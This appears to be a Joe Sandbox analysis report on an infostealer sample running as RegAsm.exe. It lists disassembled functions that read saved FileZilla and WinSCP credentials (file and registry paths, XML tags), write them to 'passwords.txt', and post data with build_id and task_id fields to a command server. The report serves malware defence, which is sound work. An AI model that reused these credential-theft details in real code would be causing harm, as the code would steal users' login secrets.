stringnetworkmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

lstrlenA.KERNEL32(?), ref: 00405519

Part of subcall function 00411E5D: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,00000000,0065E908,?,?,?,004128A1,?,?,00000000), ref: 00411E7D
Part of subcall function 00411E5D: GetProcessHeap.KERNEL32(00000000,?,?,?,?,004128A1,?,?,00000000), ref: 00411E8A
Part of subcall function 00411E5D: HeapAlloc.KERNEL32(00000000,?,?,?,004128A1,?,?,00000000), ref: 00411E91

StrCmpCA.SHLWAPI(?,00436986,0043697B,0043697A,0043696F), ref: 00405588
InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004055AA
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004056C0
HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00405704
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405736

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

lstrlenA.KERNEL32(?,",file_data,00437850,------,00437844,?,",00437838,------,0043782C,4b74261d834413e886f920a1e9dc5b33,",build_id,00437814,------), ref: 00405C67
lstrlenA.KERNEL32(?), ref: 00405C7A
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00405C92
HeapAlloc.KERNEL32(00000000), ref: 00405C99
lstrlenA.KERNEL32(?), ref: 00405CA6
_memmove.LIBCMT ref: 00405CB4
lstrlenA.KERNEL32(?,?,?), ref: 00405CC9
_memmove.LIBCMT ref: 00405CD6
lstrlenA.KERNEL32(?), ref: 00405CE4
lstrlenA.KERNEL32(?,?,00000000), ref: 00405CF2
_memmove.LIBCMT ref: 00405D05
lstrlenA.KERNEL32(?,?,00000000), ref: 00405D1A
HttpSendRequestA.WININET(?,?,00000000), ref: 00405D2D
HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 00405D6F
InternetReadFile.WININET(?,?,000007CF,?), ref: 00405E26
StrCmpCA.SHLWAPI(?,block), ref: 00405E3B
ExitProcess.KERNEL32 ref: 00405E46

Strings

------, xrefs: 0040573C
ERROR, xrefs: 00405F2F
ERROR, xrefs: 00405D79
", xrefs: 0040581B
file_data, xrefs: 00405C09
------, xrefs: 00405605
", xrefs: 00405AD8
4b74261d834413e886f920a1e9dc5b33, xrefs: 004059A7
------, xrefs: 00405B5D
", xrefs: 0040597B
------, xrefs: 004059FF
--, xrefs: 00405600
------, xrefs: 0040589D
", xrefs: 00405C35
block, xrefs: 00405E30
build_id, xrefs: 0040594F

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrlen$Internetlstrcpy$Heap$HttpProcess_memmove$AllocOpenRequestlstrcat$BinaryConnectCrackCryptExitFileInfoOptionQueryReadSendString
String ID: ------$"$"$"$"$--$------$------$------$------$4b74261d834413e886f920a1e9dc5b33$ERROR$ERROR$block$build_id$file_data
API String ID: 2638065154-874016578
Opcode ID: 728df9254f14c32eb0309421fbc2d51be9a45682cb524dc00f6aca4526101756
Instruction ID: a1f310b16752a75a1e3861b17425502ee47d614580a36b5f1e1f8e1f13a41955
Opcode Fuzzy Hash: 728df9254f14c32eb0309421fbc2d51be9a45682cb524dc00f6aca4526101756
Instruction Fuzzy Hash: 3742E671D401699BDF21FB21DC45ACDB3B9BF04308F0085E6A548B3152DAB86FCA9F98

Function 0040E6CF Relevance: 70.3, APIs: 30, Strings: 10, Instructions: 289
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37

strtok_s.MSVCRT ref: 0040E77E
GetProcessHeap.KERNEL32(00000000,000F423F,00436912,0043690F,0043690E,0043690D), ref: 0040E7C4
HeapAlloc.KERNEL32(00000000), ref: 0040E7CB
StrStrA.SHLWAPI(00000000,<Host>), ref: 0040E7DF
lstrlenA.KERNEL32(00000000), ref: 0040E7EA
StrStrA.SHLWAPI(00000000,<Port>), ref: 0040E81E
lstrlenA.KERNEL32(00000000), ref: 0040E829
StrStrA.SHLWAPI(00000000,<User>), ref: 0040E857
lstrlenA.KERNEL32(00000000), ref: 0040E862
StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040E890
lstrlenA.KERNEL32(00000000), ref: 0040E89B
lstrlenA.KERNEL32(?), ref: 0040E901
lstrlenA.KERNEL32(?), ref: 0040E915
lstrlenA.KERNEL32(0040ECBC), ref: 0040EA3D

Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E

Strings

<Pass encoding="base64">, xrefs: 0040E88A
passwords.txt, xrefs: 0040EA4D
Password: , xrefs: 0040E9AE
Soft: FileZilla, xrefs: 0040E948
<User>, xrefs: 0040E851
<Port>, xrefs: 0040E818
\AppData\Roaming\FileZilla\recentservers.xml, xrefs: 0040E71F
Login: , xrefs: 0040E98C
<Host>, xrefs: 0040E7D9
Host: , xrefs: 0040E954

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrlen$lstrcpy$AllocFile$CreateHeapLocallstrcat$CloseFolderHandleObjectPathProcessReadSingleSizeThreadWaitstrtok_s
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt
API String ID: 4146028692-935134978
Opcode ID: daf18828ca77f1c77d3f07f28c52861645635e7fac20ced428b2830730ead7d9
Instruction ID: 2e9f852a615408e756f1d7d3730d5668bfc6bf7d6dc94c0724fe4efb67adb4f0
Opcode Fuzzy Hash: daf18828ca77f1c77d3f07f28c52861645635e7fac20ced428b2830730ead7d9
Instruction Fuzzy Hash: 6FA17572A40219BBCF01FBA1DD4AADD7775AF08305F105426F501F30A1EBB9AE498F99

Function 00406BB5 Relevance: 63.6, APIs: 20, Strings: 16, Instructions: 598
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00406C54
StrCmpCA.SHLWAPI(?), ref: 00406C72
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406E0A
HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00406E4E
lstrlenA.KERNEL32(?,",status,00437998,------,0043798C,",task_id,00437978,------,0043796C,",mode,00437958,------,0043794C), ref: 0040753C
lstrlenA.KERNEL32(?), ref: 0040754B
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00407556
HeapAlloc.KERNEL32(00000000), ref: 0040755D
lstrlenA.KERNEL32(?), ref: 0040756A
_memmove.LIBCMT ref: 00407578
lstrlenA.KERNEL32(?), ref: 00407586
lstrlenA.KERNEL32(?,?,00000000), ref: 00407594
_memmove.LIBCMT ref: 004075A1
lstrlenA.KERNEL32(?,?,00000000), ref: 004075B6
HttpSendRequestA.WININET(00000000,?,00000000), ref: 004075C4
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00407621
InternetCloseHandle.WININET(00000000), ref: 0040762C
InternetCloseHandle.WININET(?), ref: 00407638
InternetCloseHandle.WININET(?), ref: 00407644
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406E7C

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Strings

", xrefs: 004070C1
mode, xrefs: 004071F1
status, xrefs: 004074B1
------, xrefs: 00406E82
------, xrefs: 00406FE3
------, xrefs: 0040729F
", xrefs: 0040737D
task_id, xrefs: 00407351
------, xrefs: 004073FF
", xrefs: 00406F61
build_id, xrefs: 00407095
------, xrefs: 00407145
4b74261d834413e886f920a1e9dc5b33, xrefs: 004070ED
", xrefs: 0040721D
", xrefs: 004074DD
------, xrefs: 00406CFC

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internetlstrlen$lstrcpy$CloseHandle$HeapHttpOpenRequest_memmovelstrcat$AllocConnectCrackFileOptionProcessReadSend
String ID: "$"$"$"$"$------$------$------$------$------$------$4b74261d834413e886f920a1e9dc5b33$build_id$mode$status$task_id
API String ID: 3702379033-1397433343
Opcode ID: 94bce884781040e8ff422804929f0a0c041406c1a25af2ad4ea517ec93a7a6fd
Instruction ID: f28151e3697947f206a0980c25f575650e410a772d733d80a29dba40e216d304
Opcode Fuzzy Hash: 94bce884781040e8ff422804929f0a0c041406c1a25af2ad4ea517ec93a7a6fd
Instruction Fuzzy Hash: 7552897194016D9ACF61EB62CD46BCCB3B5AF04308F4184E7A51D73161DA746FCA8FA8

Function 00405F39 Relevance: 53.0, APIs: 20, Strings: 10, Instructions: 466
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00405FD8
StrCmpCA.SHLWAPI(?), ref: 00405FF6
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040618E
HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 004061D2
lstrlenA.KERNEL32(?,",mode,004378D8,------,004378CC,4b74261d834413e886f920a1e9dc5b33,",build_id,004378B4,------,004378A8,",0043789C,------), ref: 004065FD
lstrlenA.KERNEL32(?), ref: 0040660C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00406617
HeapAlloc.KERNEL32(00000000), ref: 0040661E
lstrlenA.KERNEL32(?), ref: 0040662B
_memmove.LIBCMT ref: 00406639
lstrlenA.KERNEL32(?), ref: 00406647
lstrlenA.KERNEL32(?,?,00000000), ref: 00406655
_memmove.LIBCMT ref: 00406662
lstrlenA.KERNEL32(?,?,00000000), ref: 00406677
HttpSendRequestA.WININET(00000000,?,00000000), ref: 00406685
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 004066E2
InternetCloseHandle.WININET(00000000), ref: 004066ED
InternetCloseHandle.WININET(?), ref: 004066F9
InternetCloseHandle.WININET(?), ref: 00406705
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406200

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Strings

------, xrefs: 00406206
", xrefs: 004062E5
4b74261d834413e886f920a1e9dc5b33, xrefs: 00406471
------, xrefs: 00406080
", xrefs: 00406445
------, xrefs: 004064C9
build_id, xrefs: 00406419
mode, xrefs: 00406575
------, xrefs: 00406367
", xrefs: 004065A1

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internetlstrlen$lstrcpy$CloseHandle$HeapHttpOpenRequest_memmovelstrcat$AllocConnectCrackFileOptionProcessReadSend
String ID: "$"$"$------$------$------$------$4b74261d834413e886f920a1e9dc5b33$build_id$mode
API String ID: 3702379033-484867422
Opcode ID: 89793100b31f161b87fc7d4451beb843dbd63545ddb40e14516daf7b13bddfee
Instruction ID: 82dd920f4857eb4424cccb8e833476094bcda5e32b3baf042c939ae059a0737f
Opcode Fuzzy Hash: 89793100b31f161b87fc7d4451beb843dbd63545ddb40e14516daf7b13bddfee
Instruction Fuzzy Hash: FF22B9719401699BCF21EB62CD46BCCB7B5AF04308F4144E7A60DB3151DAB56FCA8FA8

Function 0040E186 Relevance: 51.1, APIs: 15, Strings: 14, Instructions: 325
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 0040E1B7
_memset.LIBCMT ref: 0040E1D7
_memset.LIBCMT ref: 0040E1E8
_memset.LIBCMT ref: 0040E1F9
RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E22D
RegGetValueA.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,?), ref: 0040E25E
RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E2BD
RegEnumKeyExA.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 0040E2E0
RegGetValueA.ADVAPI32(?,?,HostName,00000002,00000000,?,?,Host: ,Soft: WinSCP,004368E7), ref: 0040E379
RegGetValueA.ADVAPI32(?,?,PortNumber,0000FFFF,00000000,?,?,?), ref: 0040E3D9

Strings

Password: , xrefs: 0040E529
passwords.txt, xrefs: 0040E662
Security, xrefs: 0040E253
HostName, xrefs: 0040E367
Login: , xrefs: 0040E459
Software\Martin Prikryl\WinSCP 2\Configuration, xrefs: 0040E20B
PortNumber, xrefs: 0040E3BD
Password, xrefs: 0040E515
Soft: WinSCP, xrefs: 0040E2FE
Software\Martin Prikryl\WinSCP 2\Sessions, xrefs: 0040E2B3
UserName, xrefs: 0040E496
UseMasterPassword, xrefs: 0040E24E
:22, xrefs: 0040E42D
Host: , xrefs: 0040E32A

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _memset$Value$Open$Enum
String ID: Login: $:22$Host: $HostName$Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
API String ID: 3303087153-2798830873
Opcode ID: 9cb75a7071ecb74fff9e56ced005ca6b64a065f8bcd1bf242cfed6becfa28f4e
Instruction ID: 1c66541d4828bd9326f921050ea70c7b79589cb9660c5b8585550bf775721ac0
Opcode Fuzzy Hash: 9cb75a7071ecb74fff9e56ced005ca6b64a065f8bcd1bf242cfed6becfa28f4e
Instruction Fuzzy Hash: B5D1D6B295012DAADF20EB91DC42BD9B778AF04308F5018EBA508B3151DA747FC9CFA5

Function 00418643 Relevance: 48.2, APIs: 32, Instructions: 154
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32 ref: 00418684
GetProcAddress.KERNEL32 ref: 0041869B
GetProcAddress.KERNEL32 ref: 004186B2
GetProcAddress.KERNEL32 ref: 004186C9
GetProcAddress.KERNEL32 ref: 004186E0
GetProcAddress.KERNEL32 ref: 004186F7
GetProcAddress.KERNEL32 ref: 0041870E
GetProcAddress.KERNEL32 ref: 00418725
GetProcAddress.KERNEL32 ref: 0041873C
GetProcAddress.KERNEL32 ref: 00418753
GetProcAddress.KERNEL32 ref: 0041876A
GetProcAddress.KERNEL32 ref: 00418781
GetProcAddress.KERNEL32 ref: 00418798
GetProcAddress.KERNEL32 ref: 004187AF
GetProcAddress.KERNEL32 ref: 004187C6
GetProcAddress.KERNEL32 ref: 004187DD
GetProcAddress.KERNEL32 ref: 004187F4
GetProcAddress.KERNEL32 ref: 0041880B
GetProcAddress.KERNEL32 ref: 00418822
GetProcAddress.KERNEL32 ref: 00418839
LoadLibraryA.KERNEL32(?,004184C2), ref: 0041884A
LoadLibraryA.KERNEL32(?,004184C2), ref: 0041885B
LoadLibraryA.KERNEL32(?,004184C2), ref: 0041886C
LoadLibraryA.KERNEL32(?,004184C2), ref: 0041887D
LoadLibraryA.KERNEL32(?,004184C2), ref: 0041888E
GetProcAddress.KERNEL32(75B30000,004184C2), ref: 004188AA
GetProcAddress.KERNEL32(751E0000,004184C2), ref: 004188C5
GetProcAddress.KERNEL32 ref: 004188DC
GetProcAddress.KERNEL32(76910000,004184C2), ref: 004188F7
GetProcAddress.KERNEL32(75670000,004184C2), ref: 00418912
GetProcAddress.KERNEL32(77310000,004184C2), ref: 0041892D
GetProcAddress.KERNEL32 ref: 00418944

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID:
API String ID: 2238633743-0
Opcode ID: 4153ecd493db34a1094e14b788043fe07f5e2afe7ddd22b5ff6fe96697fb63f9
Instruction ID: 2c76b628124a1797fdce28c748a09696ce6250a2eaa67b4899ff399dadce2328
Opcode Fuzzy Hash: 4153ecd493db34a1094e14b788043fe07f5e2afe7ddd22b5ff6fe96697fb63f9
Instruction Fuzzy Hash: 96711675910312AFEF1ADF60FD088243BA7F70874BF10A426E91582270EB374A64EF55

